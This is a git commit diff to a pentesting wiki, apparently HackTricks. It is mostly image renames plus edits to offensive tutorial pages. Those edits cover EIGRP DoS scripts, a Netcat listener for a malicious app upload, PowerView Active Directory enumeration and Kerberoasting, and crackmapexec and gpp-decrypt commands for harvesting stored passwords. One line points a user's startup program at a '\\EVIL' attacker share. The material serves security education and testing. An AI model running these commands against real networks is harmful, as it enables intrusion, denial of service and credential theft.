GitBook: [#3572] No subject

This commit is contained in:
CPol 2022-10-05 23:14:39 +00:00 committed by gitbook-bot
parent 05eaac73d0
commit fb07c5b47f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
30 changed files with 59 additions and 49 deletions

Binary file not shown.

Before

Width:  |  Height:  |  Size: 25 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 51 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 142 KiB

After

Width:  |  Height:  |  Size: 51 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 346 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 53 KiB

After

Width:  |  Height:  |  Size: 346 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 143 KiB

After

Width:  |  Height:  |  Size: 53 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 20 KiB

After

Width:  |  Height:  |  Size: 143 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 80 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 490 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 490 KiB

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 99 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 37 KiB

After

Width:  |  Height:  |  Size: 99 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 110 KiB

After

Width:  |  Height:  |  Size: 37 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 110 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.5 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 4.5 KiB

After

Width:  |  Height:  |  Size: 12 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 20 KiB

View file

@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the routers CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **Its caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually Ill rewrite the script in C.** **I have found that generating and quickly sending out mass EIGRP hello packets overloads the routers CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **Its caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually Ill rewrite the script in C.**
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
Arguments of the script: Arguments of the script:
@ -173,7 +173,7 @@ Script arguments:
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script** The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
Script arguments Script arguments
@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy). After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure> <figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure> <figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>

View file

@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
The next step is to choose `Install app from file` and upload the application. The next step is to choose `Install app from file` and upload the application.
<figure><img src="../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).

View file

@ -307,6 +307,13 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
``` ```
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
{% endhint %}
## Read Registry ## Read Registry
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try: You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

View file

@ -225,24 +225,9 @@ If you have managed to enumerate the active directory you will have **more email
### **Looks for Creds in Computer Shares** ### **Looks for Creds in Computer Shares**
Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).\ Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
You can get help from automatic tools such as:
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)**** ****[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb.md#domain-shared-folders-search)****
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
### Steal NTLM Creds ### Steal NTLM Creds

View file

@ -493,7 +493,7 @@ Then, we change back the `userPrincipalName` of `Jane` to be something else, lik
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate. Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
## Weak Certificate Mappings - ESC10 ## Weak Certificate Mappings - ESC10
@ -538,7 +538,7 @@ Notice that the `userPrincipalName` in the certificate is `Administrator`.
Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`. Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`.
<figure><img src="../../../.gitbook/assets/image (4) (1) (2).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate. Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.

View file

@ -83,7 +83,7 @@ In the previous flow it was used the trust hash instead of the **clear text pass
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes \x00: The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes \x00:
![](<../../.gitbook/assets/image (2) (1) (2).png>) ![](<../../.gitbook/assets/image (2) (1).png>)
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable. Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.

View file

@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
Now establish the session, which will forward us to **the first server**. Now establish the session, which will forward us to **the first server**.
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a> #### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_: Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
### OpenSSH <a href="#openssh" id="openssh"></a> ### OpenSSH <a href="#openssh" id="openssh"></a>
@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
Uncompress the zip to where youd like. Then, run the install script - `Install-sshd.ps1` Uncompress the zip to where youd like. Then, run the install script - `Install-sshd.ps1`
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work. Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory. If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.

View file

@ -18,7 +18,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow
### Quick enumeration ### Quick enumeration
```bash ```powershell
Get-NetDomain #Basic domain info Get-NetDomain #Basic domain info
#User info #User info
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
@ -51,7 +51,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active
### Domain info ### Domain info
```bash ```powershell
# Domain Info # Domain Info
Get-Domain #Get info about the current domain Get-Domain #Get info about the current domain
Get-NetDomain #Get info about the current domain Get-NetDomain #Get info about the current domain
@ -76,7 +76,7 @@ Get-ForestDomain
### Users, Groups, Computers & OUs ### Users, Groups, Computers & OUs
```bash ```powershell
# Users # Users
## Get usernames and their groups ## Get usernames and their groups
Get-DomainUser -Properties name, MemberOf | fl Get-DomainUser -Properties name, MemberOf | fl
@ -105,6 +105,9 @@ Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marke
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
} }
# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
## Users with this flag might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
#Groups #Groups
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
@ -141,7 +144,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in
### Logon and Sessions ### Logon and Sessions
```bash ```powershell
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target) Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS)) Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
@ -149,12 +152,14 @@ Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admi
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host) Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
``` ```
### GPOs ### Group Policy Object - GPOs
```bash If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
```powershell
#GPO #GPO
Get-DomainGPO | select displayName Get-DomainGPO | select displayName #Check the names for info
## Get-DomainGPO and Get-NetGPO are similar
Get-NetGPO #Get all policies with details Get-NetGPO #Get all policies with details
Get-NetGPO | select displayname #Get the names of the policies Get-NetGPO | select displayname #Get the names of the policies
Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
@ -166,6 +171,13 @@ Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io"
# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights # Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
# Get permissions a user/group has over any GPO
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
# COnvert GPO GUID to name
Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
# Transform SID to name # Transform SID to name
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
@ -187,7 +199,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
### ACL ### ACL
```bash ```powershell
#Get ACLs of an object (permissions of other objects over the indicated one) #Get ACLs of an object (permissions of other objects over the indicated one)
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
@ -210,7 +222,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
### Shared files and folders ### Shared files and folders
```bash ```powershell
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters Find-InterestingDomainShareFile #Find interesting files, can use filters
@ -218,7 +230,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters
### Domain Trust ### Domain Trust
```bash ```powershell
Get-NetDomainTrust #Get all domain trusts (parent, children and external) Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-DomainTrust #Same Get-DomainTrust #Same
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
@ -237,7 +249,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
### L**ow**-**hanging fruit** ### L**ow**-**hanging fruit**
```bash ```powershell
#Check if any user passwords are set #Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -277,7 +289,7 @@ Invoke-UserHunter -Stealth
### Deleted objects ### Deleted objects
```bash ```powershell
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft #This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
@ -287,19 +299,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
#### SID to Name #### SID to Name
```bash ```powershell
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
``` ```
#### Kerberoast #### Kerberoast
```bash ```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
``` ```
#### Use different credentials (argument) #### Use different credentials (argument)
```bash ```powershell
# use an alterate creadential for any function # use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@ -308,7 +320,7 @@ Get-DomainUser -Credential $Cred
#### Impersonate a user #### Impersonate a user
```bash ```powershell
# if running in -sta mode, impersonate another credential a la "runas /netonly" # if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@ -319,7 +331,7 @@ Invoke-RevertToSelf
#### Set values #### Set values
```bash ```powershell
# set the specified property for the given user identity # set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y' # Set the owner of 'dfm' in the current domain to 'harmj0y'

View file

@ -34,12 +34,12 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access: The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
![](<../../.gitbook/assets/image (4) (1) (2) (1).png>) ![](<../../.gitbook/assets/image (4) (1) (2).png>)
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\ You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`: Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
![](<../../.gitbook/assets/image (3) (1) (1) (2).png>) ![](<../../.gitbook/assets/image (3) (1) (1).png>)
Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format: Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:

View file

@ -1154,6 +1154,12 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
``` ```
Using crackmapexec to get the passwords:
```shell-session
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
```
### IIS Web Config ### IIS Web Config
```bash ```bash

View file

@ -115,7 +115,7 @@ c:\Users\Public>
### Launch a new CMD (if you have RDP access) ### Launch a new CMD (if you have RDP access)
![](<../../.gitbook/assets/image (37).png>) ![](<../../.gitbook/assets/image (37) (1).png>)
## CLSID Problems ## CLSID Problems